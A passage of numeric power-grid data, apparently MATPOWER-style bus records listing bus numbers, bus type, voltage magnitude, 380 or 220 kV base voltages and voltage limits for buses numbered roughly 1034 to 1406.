0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1034, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1035, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1036, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1037, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1038, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1039, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1041, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1042, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1044, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1046, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1047, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1048, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1049, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1050, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1051, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1052, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1053, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1054, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1055, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1056, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1057, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1058, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1059, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1060, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1061, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1062, 2, 0, 0, 0, 
0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1063, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1064, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1065, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1066, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1067, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1068, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1069, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1071, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1072, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1073, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1074, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1075, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1077, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1078, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1079, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1080, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1081, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1082, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1083, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1084, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1085, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1086, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1087, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1088, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1089, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1090, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1091, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1092, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1093, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1094, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1095, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1096, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1097, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1098, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1099, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1101, 2, 0, 0, 0, 0, 0, 1.0, 0, 
380.0, 0, 1.1, 0.9 ], [1102, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1103, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1104, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1105, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1106, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1107, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1108, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1109, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1110, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1111, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1112, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1113, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1115, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1116, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1117, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1118, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1119, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1120, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1121, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1122, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1123, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1124, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1125, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1126, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1127, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1128, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1129, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1130, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1131, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1132, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1133, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1134, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1135, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1136, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1138, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1139, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 
], [1140, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1141, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1142, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1143, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1144, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1145, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1146, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1147, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1148, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1149, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1150, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1151, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1152, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1153, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1154, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1155, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1156, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1157, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1158, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1159, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1160, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1162, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1163, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1164, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1165, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1166, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1167, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1168, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1169, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1170, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1171, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1172, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1173, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1174, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1175, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1176, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1177, 2, 0, 0, 
0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1178, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1179, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1180, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1181, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1182, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1183, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1184, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1185, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1186, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1187, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1188, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1189, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1190, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1191, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1192, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1193, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1194, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1196, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1197, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1198, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1199, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1200, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1202, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1203, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1204, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1206, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1207, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1211, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1212, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1213, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1214, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1215, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1216, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1217, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1218, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1219, 2, 0, 0, 0, 0, 0, 1.0, 0, 
380.0, 0, 1.1, 0.9 ], [1220, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1221, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1222, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1224, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1225, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1226, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1227, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1228, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1229, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1230, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1233, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1235, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1236, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1239, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1240, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1241, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1243, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1244, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1246, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1247, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1248, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1249, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1250, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1251, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1252, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1253, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1254, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1255, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1256, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1257, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1258, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1259, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1261, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1264, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1265, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1266, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 
], [1267, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1271, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1274, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1275, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1276, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1277, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1278, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1282, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1283, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1284, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1286, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1287, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1288, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1289, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1290, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1291, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1292, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1293, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1294, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1295, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1300, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1301, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1302, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1303, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1306, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1307, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1308, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1312, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1317, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1319, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1320, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1323, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1324, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1325, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1326, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1327, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1328, 2, 0, 0, 
0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1329, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1330, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1331, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1333, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1336, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1337, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1339, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1340, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1341, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1346, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1348, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1349, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1356, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1357, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1359, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1360, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1361, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1362, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1363, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1364, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1365, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1366, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1367, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1369, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1372, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1373, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1374, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1375, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1376, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1377, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1378, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1379, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1380, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1381, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1382, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1383, 2, 0, 0, 0, 0, 0, 1.0, 0, 
380.0, 0, 1.1, 0.9 ], [1384, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1385, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1386, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1387, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1388, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1389, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1390, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1391, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1392, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1393, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1394, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1397, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1398, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1399, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1401, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1402, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1403, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1404, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1405, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1406, 2, 0, 